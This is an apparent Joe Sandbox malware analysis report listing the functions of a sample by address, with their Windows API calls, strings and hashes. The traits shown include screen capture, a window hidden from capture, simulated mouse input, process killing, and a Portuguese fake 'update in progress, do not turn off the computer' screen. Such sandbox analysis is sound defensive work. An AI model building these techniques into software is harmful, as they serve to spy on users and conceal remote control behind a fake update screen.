DeleteDC.GDI32 ref: 000000018000624F
ReleaseDC.USER32 ref: 000000018000625A
GdipDisposeImage.GDIPLUS ref: 0000000180006340

Strings

Erro ao salvar o bitmap no stream., xrefs: 000000018000622F
Erro ao criar o bitmap de 16 bits., xrefs: 00000001800060CB
, xrefs: 0000000180006106
image/png, xrefs: 00000001800061CA

Memory Dump Source

Source File: 00000006.00000002.4146753847.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000006.00000002.4146738968.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.4146793422.0000000180064000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.4146818944.0000000180085000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.4146834783.000000018008C000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_180000000_8pIuMUYQX9q.jbxd

Similarity

API ID: Gdip$CreateImage$Delete$CapsDeviceEncodersObjectReleaseStream$BitmapCompatibleDisposeFromGlobalSaveSectionSelectSize
String ID: $Erro ao criar o bitmap de 16 bits.$Erro ao salvar o bitmap no stream.$image/png
API String ID: 3104945697-3403031358
Opcode ID: 6dfdc58de49ee8967d18994761fa7e22bab36a8e9389de658f38d7ad7745b5c9
Instruction ID: 78514d6ab4e217214429bc5ef12309d396a9c21f0bf76e0b9adf4d8a6a00b21c
Opcode Fuzzy Hash: 6dfdc58de49ee8967d18994761fa7e22bab36a8e9389de658f38d7ad7745b5c9
Instruction Fuzzy Hash: C0A19F72A14B5486EB95CF66E8543DE73A2F78DBC4F508026EE4A47B64DF38C249C700

Function 0000000180026CE0 Relevance: 44.0, APIs: 24, Strings: 1, Instructions: 200windowregistryCOMMON

Download Yara Rule

APIs

LoadIconW.USER32 ref: 0000000180026E13
LoadCursorW.USER32 ref: 0000000180026E24
LoadIconW.USER32 ref: 0000000180026E54
RegisterClassExW.USER32 ref: 0000000180026E62
GetDesktopWindow.USER32 ref: 0000000180026E68
GetWindowRect.USER32 ref: 0000000180026E76
GetObjectW.GDI32 ref: 0000000180026E94
CreateWindowExW.USER32 ref: 0000000180026F07
GetWindowLongW.USER32 ref: 0000000180026F1F
SetWindowLongW.USER32 ref: 0000000180026F2F
GetWindowLongW.USER32 ref: 0000000180026F3D
SetWindowLongW.USER32 ref: 0000000180026F53
GetWindowLongW.USER32 ref: 0000000180026F61
SetWindowLongW.USER32 ref: 0000000180026F71
SetParent.USER32 ref: 0000000180026F81
ShowWindow.USER32 ref: 0000000180026F94
UpdateWindow.USER32 ref: 0000000180026F9D

Strings

Static2, xrefs: 0000000180026D32

Memory Dump Source

Source File: 00000006.00000002.4146753847.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000006.00000002.4146738968.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.4146793422.0000000180064000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.4146818944.0000000180085000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.4146834783.000000018008C000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_180000000_8pIuMUYQX9q.jbxd

Similarity

API ID: Window$Long$Load$Icon$ClassCreateCursorDesktopObjectParentRectRegisterShowUpdate
String ID: Static2
API String ID: 1164889688-2666304510
Opcode ID: 8be061642ed5066d053ea131b0dd9ea036999b9c4079782a8853e193a0fe3ece
Instruction ID: d3ee82d6ad11277726ebf87d9b6927a7585c0934009f06b820766a935acef7d3
Opcode Fuzzy Hash: 8be061642ed5066d053ea131b0dd9ea036999b9c4079782a8853e193a0fe3ece
Instruction Fuzzy Hash: 77A15D32610B988AEB828F34EC543DD33A2F7497D8F509516FA5A47B99DF38C249C740

Function 000000018000F430 Relevance: 42.3, APIs: 23, Strings: 1, Instructions: 301memorywindowCOMMON

Download Yara Rule

APIs

GlobalAlloc.KERNEL32 ref: 000000018000F47B
GlobalLock.KERNEL32 ref: 000000018000F48C
GlobalUnlock.KERNEL32 ref: 000000018000F4AE
CreateStreamOnHGlobal.OLE32 ref: 000000018000F4C4
GlobalFree.KERNEL32 ref: 000000018000F4D1
GdipAlloc.GDIPLUS ref: 000000018000F4E3
GdipCreateBitmapFromStream.GDIPLUS ref: 000000018000F517
GlobalFree.KERNEL32 ref: 000000018000F544
GdipGetImageWidth.GDIPLUS ref: 000000018000F569
GdipGetImageHeight.GDIPLUS ref: 000000018000F59C
GdipAlloc.GDIPLUS ref: 000000018000F5C9
GdipGetImagePixelFormat.GDIPLUS ref: 000000018000F5F0
GdipCreateBitmapFromScan0.GDIPLUS ref: 000000018000F626
GlobalFree.KERNEL32 ref: 000000018000F656
GdipGetImageGraphicsContext.GDIPLUS ref: 000000018000F690
GdipSetInterpolationMode.GDIPLUS ref: 000000018000F6A8
GdipDrawImageRectI.GDIPLUS ref: 000000018000F6CB
CreateStreamOnHGlobal.OLE32 ref: 000000018000F6E8
CLSIDFromString.OLE32 ref: 000000018000F719
GdipSaveImageToStream.GDIPLUS ref: 000000018000F72E
GlobalFree.KERNEL32 ref: 000000018000F76D
GlobalFree.KERNEL32 ref: 000000018000F849
GdipDeleteGraphics.GDIPLUS ref: 000000018000F855

Strings

{557CF406-1A04-11D3-9A73-0000F81EF32E}, xrefs: 000000018000F712

Memory Dump Source

Source File: 00000006.00000002.4146753847.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000006.00000002.4146738968.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.4146793422.0000000180064000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.4146818944.0000000180085000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.4146834783.000000018008C000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_180000000_8pIuMUYQX9q.jbxd

Similarity

API ID: Gdip$Global$Image$Free$CreateStream$AllocFrom$BitmapGraphics$ContextDeleteDrawFormatHeightInterpolationLockModePixelRectSaveScan0StringUnlockWidth
String ID: {557CF406-1A04-11D3-9A73-0000F81EF32E}
API String ID: 363814123-3380703870
Opcode ID: 78a3b2c2ef955b7988a542f513e4f647c73711e27d229bada3f1691ed9e0dc81
Instruction ID: cad57c66d094a19c9d22020cc88e6132a02a508f102aff6e89dd7ed8227f1873
Opcode Fuzzy Hash: 78a3b2c2ef955b7988a542f513e4f647c73711e27d229bada3f1691ed9e0dc81
Instruction Fuzzy Hash: F1D11536704B488AEB91CF66E85439D33A2FB8DBC4F518526EE5E57B24DF38C6498340

Function 00007FF6B40A7B4C Relevance: 39.0, APIs: 21, Strings: 1, Instructions: 468COMMONLIBRARYCODE

Download Yara Rule

APIs

__doserrno.LIBCMT ref: 00007FF6B40A7B9D
_errno.LIBCMT ref: 00007FF6B40A7BA4

Strings

U, xrefs: 00007FF6B40A815B

Memory Dump Source

Source File: 00000006.00000002.4146867541.00007FF6B40A1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6B40A0000, based on PE: true

Associated: 00000006.00000002.4146851129.00007FF6B40A0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4146885168.00007FF6B40AB000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4146901761.00007FF6B40AF000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4146915321.00007FF6B40B3000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff6b40a0000_8pIuMUYQX9q.jbxd

Similarity

API ID: __doserrno_errno
String ID: U
API String ID: 921712934-4171548499
Opcode ID: 525220077124e71a9365c643689a82b69fa9c02e291243d553cccb9d965a7cb4
Instruction ID: c8e2032348206b5c9b093b1888c035d142c3dabf3e452d1f2740209cba221ae4
Opcode Fuzzy Hash: 525220077124e71a9365c643689a82b69fa9c02e291243d553cccb9d965a7cb4
Instruction Fuzzy Hash: D912B322A1C64286EB208F2DD4C43BAB7A0FF98744F558136DB8D87A95DF3DE845CB10

Function 0000000180023BF0 Relevance: 38.7, APIs: 13, Strings: 9, Instructions: 172timeCOMMON

Download Yara Rule

APIs

KillTimer.USER32 ref: 0000000180023C58
SetTimer.USER32 ref: 0000000180023C71
KillTimer.USER32 ref: 0000000180023C88
SetTimer.USER32 ref: 0000000180023CA2
KillTimer.USER32 ref: 0000000180023CB9
SetTimer.USER32 ref: 0000000180023CD3
KillTimer.USER32 ref: 0000000180023CEA
SetTimer.USER32 ref: 0000000180023D04
KillTimer.USER32 ref: 0000000180023D1B
SetTimer.USER32 ref: 0000000180023D35
KillTimer.USER32 ref: 0000000180023D4C
SetTimer.USER32 ref: 0000000180023D66
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 0000000180023EC9

Strings

P, xrefs: 0000000180023D0A
(, xrefs: 0000000180023C77
0SK, xrefs: 0000000180023E51
<, xrefs: 0000000180023CD9
% concludo(s)No desligue o computador, xrefs: 0000000180023D8A
Z, xrefs: 0000000180023D3B
d, xrefs: 0000000180023C40
Aguarde, concluindo etapas finais da atualizao...No desligue o computador, xrefs: 0000000180023D93
2, xrefs: 0000000180023CA8

Memory Dump Source

Source File: 00000006.00000002.4146753847.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000006.00000002.4146738968.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.4146793422.0000000180064000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.4146818944.0000000180085000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.4146834783.000000018008C000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_180000000_8pIuMUYQX9q.jbxd

Similarity

API ID: Timer$Kill$_invalid_parameter_noinfo_noreturn
String ID: % concludo(s)No desligue o computador$($0SK$2$<$Aguarde, concluindo etapas finais da atualizao...No desligue o computador$P$Z$d
API String ID: 1637511918-65316752
Opcode ID: 58912bc1e8516375a542f86d5e1acfce9016e4a59ccce09397a520d500cdef0e
Instruction ID: 4c89d083ca5c1ccbd95d9cb5e5c2138fae9d00d0dca91a585749118823e5ecc5
Opcode Fuzzy Hash: 58912bc1e8516375a542f86d5e1acfce9016e4a59ccce09397a520d500cdef0e
Instruction Fuzzy Hash: 2B816B72600B4886FB9ACB11EC857DA2362FB8DBC4F51D012EA4947AA5DF38C78DC741

Function 00000001800243C0 Relevance: 38.6, APIs: 19, Strings: 3, Instructions: 137windowregistryCOMMON

Download Yara Rule

APIs

LoadIconW.USER32 ref: 0000000180024451
LoadCursorW.USER32 ref: 0000000180024465
GetStockObject.GDI32 ref: 0000000180024477
LoadIconW.USER32 ref: 00000001800244A0
RegisterClassExW.USER32 ref: 00000001800244B4
CreateWindowExW.USER32 ref: 0000000180024502
GetWindowLongW.USER32 ref: 0000000180024513
SetWindowLongW.USER32 ref: 0000000180024523
GetWindowLongW.USER32 ref: 0000000180024531
SetWindowLongW.USER32 ref: 0000000180024547
GetWindowLongW.USER32 ref: 0000000180024555
SetWindowLongW.USER32 ref: 0000000180024565
SetWindowPos.USER32 ref: 0000000180024594
BringWindowToTop.USER32 ref: 000000018002459D
MagSetWindowFilterList.MAGNIFICATION ref: 00000001800245CA
GetMessageW.USER32 ref: 00000001800245E4
TranslateMessage.USER32 ref: 00000001800245F5
DispatchMessageW.USER32 ref: 0000000180024600
GetMessageW.USER32 ref: 0000000180024613

Strings

Static, xrefs: 000000018002447D
MAINMODAL6, xrefs: 0000000180024410
C, xrefs: 000000018002457A

Memory Dump Source

Source File: 00000006.00000002.4146753847.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000006.00000002.4146738968.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.4146793422.0000000180064000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.4146818944.0000000180085000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.4146834783.000000018008C000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_180000000_8pIuMUYQX9q.jbxd

Similarity

API ID: Window$Long$Message$Load$Icon$BringClassCreateCursorDispatchFilterListObjectRegisterStockTranslate
String ID: C$MAINMODAL6$Static
API String ID: 4009298016-1109018439
Opcode ID: 1eeb3ac38cdc2e839e92566742e8c9611ad0308782ecc87ab17419388a987a73
Instruction ID: ab56744deedb3ec691bbb351d0b4a0c7c74c44e911e942f622a5272ea87e163a
Opcode Fuzzy Hash: 1eeb3ac38cdc2e839e92566742e8c9611ad0308782ecc87ab17419388a987a73
Instruction Fuzzy Hash: 1761F632204B4882F7969F25FC5479A33A2FB8E7D4F548126B95A47BA5DF3CC3488B01

Function 000000018000D4B0 Relevance: 33.9, APIs: 15, Strings: 4, Instructions: 604encryptionCOMMON

Download Yara Rule

APIs

Part of subcall function 0000000180042194: GetSystemTimeAsFileTime.KERNEL32 ref: 00000001800421A8

CryptAcquireContextW.ADVAPI32 ref: 000000018000DA60
CryptCreateHash.ADVAPI32 ref: 000000018000DA89
CryptHashData.ADVAPI32 ref: 000000018000DABC
CryptGetHashParam.ADVAPI32 ref: 000000018000DADB
CryptDestroyHash.ADVAPI32 ref: 000000018000DB24
CryptReleaseContext.ADVAPI32 ref: 000000018000DB33
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 000000018000DED1
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 000000018000DF11
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 000000018000DF1D
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 000000018000DF23
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 000000018000DF29
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 000000018000DF2F
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 000000018000DF35
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 000000018000DF3B
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 000000018000DF41

Strings

%02x, xrefs: 000000018000DB08
J, xrefs: 000000018000D87D
ios_base::badbit set, xrefs: 000000018000DEE4
pa36, xrefs: 000000018000D522

Memory Dump Source

Source File: 00000006.00000002.4146753847.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000006.00000002.4146738968.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.4146793422.0000000180064000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.4146818944.0000000180085000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.4146834783.000000018008C000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_180000000_8pIuMUYQX9q.jbxd

Similarity

API ID: _invalid_parameter_noinfo_noreturn$Crypt$Hash$ContextTime$AcquireCreateDataDestroyFileParamReleaseSystem
String ID: %02x$J$ios_base::badbit set$pa36
API String ID: 3767510310-2402575416
Opcode ID: 65ae1707ff721539dcae47325d6364a20eb63e56fdc352f186694426bdc34ecf
Instruction ID: e1471474cdada995e04336969b8eab2a44c7ba73175f60e835869a142fe113b6
Opcode Fuzzy Hash: 65ae1707ff721539dcae47325d6364a20eb63e56fdc352f186694426bdc34ecf
Instruction Fuzzy Hash: 97525B72610BC889EB61DF79D8843DE3361F789798F508616EA5D07BA9DF74C289C700

Function 00007FF6B40A5E54 Relevance: 28.9, APIs: 19, Instructions: 377COMMONLIBRARYCODE

Download Yara Rule

APIs

LCMapStringW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00007FF6B40A6405), ref: 00007FF6B40A5EC6
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00007FF6B40A6405), ref: 00007FF6B40A5EDC
MultiByteToWideChar.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00007FF6B40A6405), ref: 00007FF6B40A5F86
malloc.LIBCMT ref: 00007FF6B40A5FF7
MultiByteToWideChar.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00007FF6B40A6405), ref: 00007FF6B40A602E
LCMapStringW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00007FF6B40A6405), ref: 00007FF6B40A6053
LCMapStringW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00007FF6B40A6405), ref: 00007FF6B40A60A3
malloc.LIBCMT ref: 00007FF6B40A60F6
LCMapStringW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00007FF6B40A6405), ref: 00007FF6B40A6130
WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00007FF6B40A6405), ref: 00007FF6B40A6173
free.LIBCMT ref: 00007FF6B40A6184
free.LIBCMT ref: 00007FF6B40A6192
LCMapStringA.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00007FF6B40A6405), ref: 00007FF6B40A6221
malloc.LIBCMT ref: 00007FF6B40A628F
LCMapStringA.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00007FF6B40A6405), ref: 00007FF6B40A62D8
free.LIBCMT ref: 00007FF6B40A6320
LCMapStringA.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00007FF6B40A6405), ref: 00007FF6B40A6340
free.LIBCMT ref: 00007FF6B40A6352
free.LIBCMT ref: 00007FF6B40A6364

Memory Dump Source

Source File: 00000006.00000002.4146867541.00007FF6B40A1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6B40A0000, based on PE: true

Associated: 00000006.00000002.4146851129.00007FF6B40A0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4146885168.00007FF6B40AB000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4146901761.00007FF6B40AF000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4146915321.00007FF6B40B3000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff6b40a0000_8pIuMUYQX9q.jbxd

Similarity

API ID: String$free$ByteCharMultiWidemalloc$ErrorLast
String ID:
API String ID: 1837315383-0
Opcode ID: 04ec537f440bf068c4acf5589c79c13f7358f96fb834292078e18aee6a618a2f
Instruction ID: 1c8b06f3d11758bc7499e5966933dc74c08e480e7d8679ab51869913c12c48f5
Opcode Fuzzy Hash: 04ec537f440bf068c4acf5589c79c13f7358f96fb834292078e18aee6a618a2f
Instruction Fuzzy Hash: 4EF1B232A086818AE7208F2DD4845BD77A1FF84B98F585A35EB9D87BD5DF3CE9418700

Function 00000001800231C0 Relevance: 26.4, APIs: 13, Strings: 2, Instructions: 139windowCOMMON

Download Yara Rule

APIs

GetSystemMetrics.USER32 ref: 00000001800231F3
GetSystemMetrics.USER32 ref: 0000000180023201
GetDC.USER32 ref: 000000018002320B
CreateCompatibleDC.GDI32 ref: 0000000180023217
CreateCompatibleBitmap.GDI32 ref: 0000000180023229
SelectObject.GDI32 ref: 0000000180023238
BitBlt.GDI32 ref: 0000000180023267
GetDIBits.GDI32 ref: 00000001800232D6
CreateCompatibleBitmap.GDI32 ref: 0000000180023366
SetDIBits.GDI32 ref: 000000018002338F
DeleteObject.GDI32 ref: 00000001800233A0
DeleteDC.GDI32 ref: 00000001800233A9
ReleaseDC.USER32 ref: 00000001800233B4

Strings

, xrefs: 000000018002323E
(, xrefs: 000000018002326F

Memory Dump Source

Source File: 00000006.00000002.4146753847.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000006.00000002.4146738968.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.4146793422.0000000180064000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.4146818944.0000000180085000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.4146834783.000000018008C000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_180000000_8pIuMUYQX9q.jbxd

Similarity

API ID: CompatibleCreate$BitmapBitsDeleteMetricsObjectSystem$ReleaseSelect
String ID: $(
API String ID: 4079763096-55695022
Opcode ID: 80c2a8ffa88a527937a1ede35b9a5744ad462481cacade0f566d36ee95abbd99
Instruction ID: 9236aba1cb1f92a398c1da3ba75cacce1b9e8f5bf95f047d0c3bc50d214f4ffa
Opcode Fuzzy Hash: 80c2a8ffa88a527937a1ede35b9a5744ad462481cacade0f566d36ee95abbd99
Instruction Fuzzy Hash: 7051E432219B908AE792DF36B80475AB7A5F78EBC4F108215EE5A47B15DF3DC149CB00

Function 0000000180057BA8 Relevance: 24.0, APIs: 9, Strings: 4, Instructions: 1209COMMON

Download Yara Rule

APIs

fegetenv.LIBCMT ref: 0000000180057BED
_invalid_parameter_noinfo.LIBCMT ref: 00000001800581ED
_invalid_parameter_noinfo.LIBCMT ref: 00000001800583A4
_invalid_parameter_noinfo.LIBCMT ref: 00000001800585B8
_invalid_parameter_noinfo.LIBCMT ref: 0000000180058861
_invalid_parameter_noinfo.LIBCMT ref: 0000000180058A5E
memcpy_s.LIBCPMT ref: 0000000180058B49
memcpy_s.LIBCPMT ref: 0000000180058BF4
memcpy_s.LIBCPMT ref: 0000000180058CBA

Strings

1#SNAN, xrefs: 0000000180058D6C
1#INF, xrefs: 0000000180058D8B
1#QNAN, xrefs: 0000000180058D78
1#IND, xrefs: 0000000180058D60

Memory Dump Source

Source File: 00000006.00000002.4146753847.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000006.00000002.4146738968.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.4146793422.0000000180064000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.4146818944.0000000180085000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.4146834783.000000018008C000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_180000000_8pIuMUYQX9q.jbxd

Similarity

API ID: _invalid_parameter_noinfo$memcpy_s$fegetenv
String ID: 1#IND$1#INF$1#QNAN$1#SNAN
API String ID: 808467561-2761157908
Opcode ID: dab08ebfd4f155faae2c7199c7e48372d1813e6be20688130f04eb12e4c23dea
Instruction ID: 5f107cab6f598d0afb864162b5b552a074b034bce2d8f950e0579cbdbe0a167f
Opcode Fuzzy Hash: dab08ebfd4f155faae2c7199c7e48372d1813e6be20688130f04eb12e4c23dea
Instruction Fuzzy Hash: 6BB2D172B142888BE7A68E28D4407ED37A1F7483C8F549115FE1A7BA85DF36DB09DB40

Function 0000000180006380 Relevance: 18.2, APIs: 12, Instructions: 161sleepCOMMON

Download Yara Rule

APIs

GetDesktopWindow.USER32 ref: 00000001800063A9
GetWindowRect.USER32 ref: 00000001800063B7
GetSystemMetrics.USER32 ref: 00000001800063CF
GetSystemMetrics.USER32 ref: 00000001800063E4
mouse_event.USER32 ref: 000000018000640B
mouse_event.USER32 ref: 0000000180006471
Sleep.KERNEL32 ref: 000000018000647C
mouse_event.USER32 ref: 0000000180006496
GetSystemMetrics.USER32 ref: 0000000180006553
GetSystemMetrics.USER32 ref: 000000018000656D
mouse_event.USER32 ref: 0000000180006599
Sleep.KERNEL32 ref: 00000001800065A4

Memory Dump Source

Source File: 00000006.00000002.4146753847.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000006.00000002.4146738968.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.4146793422.0000000180064000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.4146818944.0000000180085000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.4146834783.000000018008C000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_180000000_8pIuMUYQX9q.jbxd

Similarity

API ID: MetricsSystemmouse_event$SleepWindow$DesktopRect
String ID:
API String ID: 3770948670-0
Opcode ID: c6845006683d81986fc8de9207332de4146866f476b1708f1b4dba7d84846be8
Instruction ID: b9108a94d0d0f92d468c02afed08280f49f7b32367425eaf9b8b5e3e3e8fcaff
Opcode Fuzzy Hash: c6845006683d81986fc8de9207332de4146866f476b1708f1b4dba7d84846be8
Instruction Fuzzy Hash: F851C072A00B498BF7A6CF28ED587A53792F74C784F10952AB90747AA6DF78874C8740

Function 0000000180005290 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 117processCOMMON

Download Yara Rule

APIs

CreateToolhelp32Snapshot.KERNEL32 ref: 00000001800052C1
Process32FirstW.KERNEL32 ref: 00000001800052F9
OpenProcess.KERNEL32 ref: 0000000180005354
TerminateProcess.KERNEL32 ref: 000000018000536B
CloseHandle.KERNEL32 ref: 0000000180005374
Process32NextW.KERNEL32 ref: 000000018000542E
CloseHandle.KERNEL32 ref: 000000018000543F

Strings

Erro ao criar snapshot de processos., xrefs: 00000001800052D0
terminado., xrefs: 00000001800053A6
Processo , xrefs: 000000018000537A

Memory Dump Source

Source File: 00000006.00000002.4146753847.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000006.00000002.4146738968.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.4146793422.0000000180064000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.4146818944.0000000180085000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.4146834783.000000018008C000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_180000000_8pIuMUYQX9q.jbxd

Similarity

API ID: CloseHandleProcessProcess32$CreateFirstNextOpenSnapshotTerminateToolhelp32
String ID: terminado.$Erro ao criar snapshot de processos.$Processo
API String ID: 2696918072-1950786475
Opcode ID: fcfe278171f840c45f01cae4146234910b500e170f3affa0fe0ab8b2dd7c6c05
Instruction ID: da16750766f636819f27479fda140e06209c5c666560eb51f2174e8a222fe7a9
Opcode Fuzzy Hash: fcfe278171f840c45f01cae4146234910b500e170f3affa0fe0ab8b2dd7c6c05
Instruction Fuzzy Hash: 5B518736204B4881EB96DB22E8543EE33A1FB8DFD5F44C126EA5E07795DF38C6498340

Function 00007FF6B40A4E08 Relevance: 17.3, APIs: 11, Instructions: 757COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF6B40A1780: _getptd.LIBCMT ref: 00007FF6B40A1796

_errno.LIBCMT ref: 00007FF6B40A4E76

Part of subcall function 00007FF6B40A3314: DecodePointer.KERNEL32 ref: 00007FF6B40A333B

DecodePointer.KERNEL32 ref: 00007FF6B40A5495
DecodePointer.KERNEL32 ref: 00007FF6B40A54DC
DecodePointer.KERNEL32 ref: 00007FF6B40A5506

Part of subcall function 00007FF6B40A6724: malloc.LIBCMT ref: 00007FF6B40A6743
Part of subcall function 00007FF6B40A6724: Sleep.KERNEL32(?,?,00000000,00007FF6B40A5B2D,?,?,00000000,00007FF6B40A5BD7,?,?,00000000,00007FF6B40A2F21,?,?,00000000,00007FF6B40A2FD8), ref: 00007FF6B40A675A

write_multi_char.LIBCMT ref: 00007FF6B40A55A2
write_multi_char.LIBCMT ref: 00007FF6B40A55D7
write_char.LIBCMT ref: 00007FF6B40A562E
write_multi_char.LIBCMT ref: 00007FF6B40A5688
free.LIBCMT ref: 00007FF6B40A56B3
_errno.LIBCMT ref: 00007FF6B40A5967

Memory Dump Source

Source File: 00000006.00000002.4146867541.00007FF6B40A1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6B40A0000, based on PE: true

Associated: 00000006.00000002.4146851129.00007FF6B40A0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4146885168.00007FF6B40AB000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4146901761.00007FF6B40AF000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4146915321.00007FF6B40B3000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff6b40a0000_8pIuMUYQX9q.jbxd

Similarity

API ID: DecodePointer$write_multi_char$_errno$Sleep_getptdfreemallocwrite_char
String ID:
API String ID: 3557194103-0
Opcode ID: 9f889c3d8dc703db5ffec5448e3a038fb09217d31b13c5e656929576276815a2
Instruction ID: 457fd32e17bdb2ad655ef6e5e5a5960362a317b680d8c9629f95a3dc59f9b35c
Opcode Fuzzy Hash: 9f889c3d8dc703db5ffec5448e3a038fb09217d31b13c5e656929576276815a2
Instruction Fuzzy Hash: 8F62C032A0C68686EB708F18A48437E66A1FF85794F644136DB8EC7AD5DE7DE840CF40

Function 000000018001DE80 Relevance: 16.1, APIs: 6, Strings: 3, Instructions: 399COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 000000018001DEAB
std::_Lockit::_Lockit.LIBCPMT ref: 000000018001DED0
std::_Lockit::~_Lockit.LIBCPMT ref: 000000018001DEFA
